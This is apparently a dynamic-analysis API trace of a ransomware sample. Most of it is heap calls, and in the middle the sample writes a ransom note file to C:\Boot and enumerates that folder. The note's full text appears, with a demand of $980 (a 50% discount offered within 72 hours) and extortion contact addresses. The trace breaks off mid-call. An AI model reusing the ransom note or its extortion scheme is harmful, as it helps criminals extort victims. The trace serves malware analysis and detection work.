[0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.491] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.493] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.493] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.493] PathFindFileNameW (pszPath="") returned="" [0165.493] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.494] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.494] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.494] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.494] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0165.494] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.494] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0165.494] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b42498 [0165.495] lstrcpyW (in: lpString1=0x3b42498, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.495] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.495] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.495] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b42498 | out: hHeap=0xcd0000) returned 1 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.496] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c1d8 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.496] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2c8 | out: hHeap=0xcd0000) returned 1 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x54) returned 0x3613610 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c278 [0165.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2a0 | out: hHeap=0xcd0000) returned 1 [0165.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362b8e0 | out: hHeap=0xcd0000) returned 1 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c250 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3280 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c278 [0165.497] RtlAllocateHeap 